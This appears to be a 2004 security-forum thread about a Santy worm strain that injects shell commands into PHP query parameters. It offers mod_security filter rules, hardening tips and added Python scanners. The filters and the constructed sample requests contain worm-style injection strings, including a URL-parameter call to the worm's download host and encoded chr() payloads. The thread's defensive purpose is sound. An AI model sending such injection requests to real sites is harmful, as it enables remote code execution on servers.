CastleCops, Internet Crime Fighters
Be Advised!: New Santy Strain Attacks All PHP Web Scripts!
Worms
Folks, it seems that the Santy worm has taken on a new strain. It also searches Yahoo now in addition to Google, and it looks for any PHP script with every possible argument passed through in the HTTP GET. This worm tries all arguments of your PHP script to throw in shell commands that access a particular website, download some text files into /tmp, and then execute them using Perl. If you are using mod_security, you might want to try something like this (it's working for us so far):

SecFilter "visualcoders\.net/spy\.gif\?\&cmd"
SecFilter ":/"

Just in case the URL changes, the latter should still catch all sorts of:

http://
ftp://

Naturally, the latter also filters on

%3a%2f

It is Christmas after all, so a quick patch that throws HTTP 406s at the requester through the above filters works.
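The two SecFilter rules above, re-implemented as a small offline log scanner so their matching behaviour can be checked against sample requests. This is an added example, not the CastleCops mod_security configuration. It assumes that mod_security 1.x matches SecFilter patterns against the URL-decoded request (which is why ":/" also catches "%3a%2f"), and the access-log lines, client addresses and the example.invalid host are constructed for the demonstration.

```python
"""Added example (not the CastleCops configuration): the two SecFilter
rules from the post, re-implemented as a small offline log scanner so the
matching behaviour can be checked against sample requests.

Assumptions not stated on the page:
  * mod_security 1.x matches SecFilter patterns against the request after
    URL-decoding it, so the scanner decodes each URI once before matching;
    that is why ":/" also catches "%3a%2f".
  * The access-log lines below are constructed for this demonstration.
"""
import re
from urllib.parse import unquote

# The two filters from the post, as Python regular expressions.
FILTERS = {
    "visualcoders": re.compile(r"visualcoders\.net/spy\.gif\?\&cmd"),
    "colon_slash": re.compile(r":/"),
}

# Constructed Apache-style access log: two worm-like requests, two benign
# requests, and one benign request that the broad ":/" filter also blocks.
SAMPLE_LOG = """\
10.0.0.1 - - [25/Dec/2004:16:01:02 +0000] "GET /index.php?page=http://visualcoders.net/spy.gif?&cmd=cd%20/tmp HTTP/1.1" 200 512
10.0.0.2 - - [25/Dec/2004:16:02:10 +0000] "GET /news.php?id=ftp%3a%2f%2fexample.invalid/x.txt HTTP/1.1" 200 512
10.0.0.3 - - [25/Dec/2004:16:03:45 +0000] "GET /forum.php?topic=christmas HTTP/1.1" 200 2048
10.0.0.4 - - [25/Dec/2004:16:04:00 +0000] "GET /style.css HTTP/1.1" 200 300
10.0.0.5 - - [25/Dec/2004:16:05:30 +0000] "GET /link.php?url=http%3A%2F%2Fexample.invalid%2Fpage HTTP/1.1" 200 100
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/\d\.\d"')


def request_uri(line):
    """Pull the request URI out of one common-log-format line, or None."""
    m = REQUEST_RE.search(line)
    return m.group(1) if m else None


def matched_filters(uri):
    """Names of the filters that fire on the URL-decoded URI."""
    decoded = unquote(uri)          # one decoding round, like the module
    return [name for name, rx in FILTERS.items() if rx.search(decoded)]


def scan(log_text=SAMPLE_LOG):
    """Return (per-filter match counts, list of (client, uri, filters))."""
    counts = {name: 0 for name in FILTERS}
    hits = []
    for line in log_text.splitlines():
        uri = request_uri(line)
        if uri is None:
            continue
        names = matched_filters(uri)
        for name in names:
            counts[name] += 1
        if names:                    # these requests would get the 406
            hits.append((line.split(" ", 1)[0], uri, names))
    return counts, hits


if __name__ == "__main__":
    counts, hits = scan()
    print("Filter -> # of matches")
    for name, n in counts.items():
        print(f"{FILTERS[name].pattern} -> {n}")
    for client, uri, names in hits:
        print(f"406 {client} {uri} ({', '.join(names)})")
```

The fifth sample line is the cost of the catch-all: any legitimate parameter that carries a full URL (a redirect or link target) also contains ":/" after decoding and is blocked along with the worm traffic. The post does not show how the 406 is produced; the scanner only reports which requests would be denied.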
Posted on Saturday, 25 December 2004 @ 16:33:38 UTC by Paul (5710 reads)
15 comments

Re: New Santy Strain Attacks All PHP Web Scripts! (Score: 1)
by Paul on Saturday, 25 December 2004 @ 17:21:52 UTC (http://www.laudanski.com)
OK, the first filter above works, but certainly the second one has caught some of this now:

operator.netfirms.com

I'd like to think of the second filter as a catch-all.



Re: New Santy Strain Attacks All PHP Web Scripts! (Score: 1)
by Paul on Sunday, 26 December 2004 @ 01:06:53 UTC (http://www.laudanski.com)
Some other basic tips, JIC (proceed with caution):

You can try mounting your /tmp with noexec, so that no files are allowed to be executed there. Beware, though: other mounts may need it too, like /var/tmp and /usr/tmp. This may stop lots of local or remote attacks, but it isn't 100% foolproof either.

You can also chmod 700 or 400, if you like, wget and all *cc* in /usr/bin. This will allow root-only access to those files.

Again, not 100% foolproof stuff, but it certainly can help.



Re: New Santy Strain Attacks All PHP Web Scripts! (Score: 1)
by Paul on Saturday, 25 December 2004 @ 22:28:56 UTC (http://www.laudanski.com)
A lot of these rely on the tick mark:

'

So a really broad filter; for those who are vulnerable, it could mean the difference:

SecFilter "'"



Re: New Santy Strain Attacks All PHP Web Scripts! (Score: 1)
by Paul on Sunday, 26 December 2004 @ 01:18:46 UTC (http://www.laudanski.com)
I've seen some folks filtering echr or esystem from the GET requests. This is flawed, because they are oftentimes preceded by

%2525echr(x)

where x is any character.

This turns into

%.chr(x)

which is a concatenation in PHP, and chr is a PHP function call:

http://php.net/chr

So filtering on echr or esystem is not valid, as e is part of the hexadecimal code, and, simply put, it can be replaced with another hex code; then the echr filter would not match.

Filtering on chr doesn't work either, because you can get multiple false positive matches:

chris
christmas
christ
etc.

Instead of focusing on the good characters, you need to focus on the bad characters, like the tick mark.


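The encoding argument in the comment above, and the tick-mark filter from the earlier comment, worked through in code. This is an added example, not code from the comments: it unwraps percent-encoded Santy-style query strings layer by layer and compares a substring filter on "echr", one on "chr", and SecFilter "'" applied to the fully decoded request. The sample query strings are constructed for the demonstration (they use the %2527 tick and a %252e dot the comments mention) and are not captured worm traffic.

```python
"""Added example, not code from the comments above: how a percent-encoded
Santy-style payload unwraps under repeated URL decoding, and why substring
filters on "echr" or "chr" are fragile while the tick-mark filter from the
earlier comment (SecFilter "'") holds up once the request is fully decoded.

Assumptions: the sample query strings are constructed for this
demonstration; they follow the encodings the comments mention (%2527 for
the tick, %252e for the dot) but are not captured worm traffic.
"""
from urllib.parse import unquote


def decode_fully(s, max_rounds=8):
    """Percent-decode until the string stops changing (bounded, so a
    pathological input cannot keep the loop busy forever)."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


# Constructed samples: three hostile variants of one payload, two benign.
SAMPLES = {
    # double-encoded tick and dot around chr(): raw text contains "echr"
    "santy_lower": "highlight=%2527%252echr(120)%252e%2527",
    # identical after decoding, but the hex digit is upper-case: no "echr"
    "santy_upper": "highlight=%2527%252Echr(120)%252E%2527",
    # an encoded space between the dot and chr(), legal in PHP: no "echr"
    "santy_space": "highlight=%2527%252e%2520chr(120)%252e%2527",
    # benign word that happens to contain "chr"
    "benign_word": "highlight=christmas",
    # benign apostrophe: the broad tick filter blocks this one too
    "benign_tick": "highlight=don%27t",
}


def filter_echr(raw):
    """Substring filter on the raw request, as criticised in the comment."""
    return "echr" in raw


def filter_chr(raw):
    """Substring filter on "chr": fires on the worm and on "christmas"."""
    return "chr" in raw


def filter_tick(raw):
    """SecFilter "'" applied to the fully decoded request."""
    return "'" in decode_fully(raw)


def evaluate(samples=SAMPLES):
    """Return {sample: {filter: fired?}} for every sample and filter."""
    return {
        name: {
            "echr": filter_echr(raw),
            "chr": filter_chr(raw),
            "tick": filter_tick(raw),
        }
        for name, raw in samples.items()
    }


if __name__ == "__main__":
    results = evaluate()
    for name, raw in SAMPLES.items():
        print(f"{name:12s} {decode_fully(raw)!r:28s} {results[name]}")
```

Two of the three hostile variants never contain the literal "echr", so that filter misses them, while "chr" also fires on "christmas"; only the decoded tick catches all three. The example decodes until the string is stable, which is more than mod_security's single pass; with one decoding round the same coverage needs the raw encodings as well, which is exactly the set the statistics comment below lists (', %27 and %2527). The "don't" sample shows the trade-off of that broad rule: a benign apostrophe is blocked too.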

Re: New Santy Strain Attacks All PHP Web Scripts! (Score: 1)
by Paul on Sunday, 26 December 2004 @ 10:32:30 UTC (http://www.laudanski.com)
Although it is admirable that this new strain be called 'santy.c', I have noticed on the web that folks seem to think it is still only phpBB highlight related. That in and of itself is creating a communications issue. 20/20 hindsight, right? Academically, it should have been titled differently.

From my mod_security filters, I have found today (10 hours) the following statistics in matches (random verification sampling shows no FPs thus far) as of about 30 minutes ago:

Filter -> # of matches

%27 -> 51
:/ -> 21,565
' -> 3,405
visualcoders\.net/spy\.gif\?\&cmd -> 53,890
%2527 -> 725



Re: New Santy Strain Attacks All PHP Web Scripts! (Score: 1)
by Robin on Sunday, 26 December 2004 @ 21:40:31 UTC
/paul

I might also add that if you are using mod_rewrite to redirect those source IP addresses which match your filters, redirect them to localhost: 127.0.0.1. This way, they continue to inflict the requests upon themselves. If traffic is generated, why let more of it onto the Net?



Re: New Santy Strain Attacks All PHP Web Scripts! (Score: 1)
by Snail on Tuesday, 28 December 2004 @ 15:07:45 UTC
Pity bad programmers keep finding new ways to old solutions.

Isn't it just amazing how once again, people using Proxomitron don't suffer this problem?


